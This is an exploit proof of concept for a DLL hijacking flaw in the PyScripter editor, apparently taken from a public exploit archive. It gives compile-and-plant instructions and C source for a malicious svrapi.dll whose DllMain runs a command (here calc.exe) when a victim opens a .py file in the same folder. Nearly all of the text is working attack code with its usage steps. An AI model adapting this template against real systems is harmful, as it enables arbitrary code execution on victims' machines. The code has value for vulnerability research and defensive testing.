/* #[+] Author: TUNISIAN CYBER #[+] Exploit Title: PyScriper DLL Hijacking #[+] Date: 05-04-2015 #[+] Type: Local Exploits #[+] Vendor: https://code.google.com/p/pyscripter/ #[+] Tested on: WinXp/Windows 7 Pro #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] gcc -shared -o svrapi.dll dllhijack.c then put svrapi.dll and create a .py file in the same dir, open the .py file , calc.exe execute. Proof of Concept (PoC): ======================= */ #include <windows.h> int tunisian() { WinExec("calc", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { tunisian(); return 0; }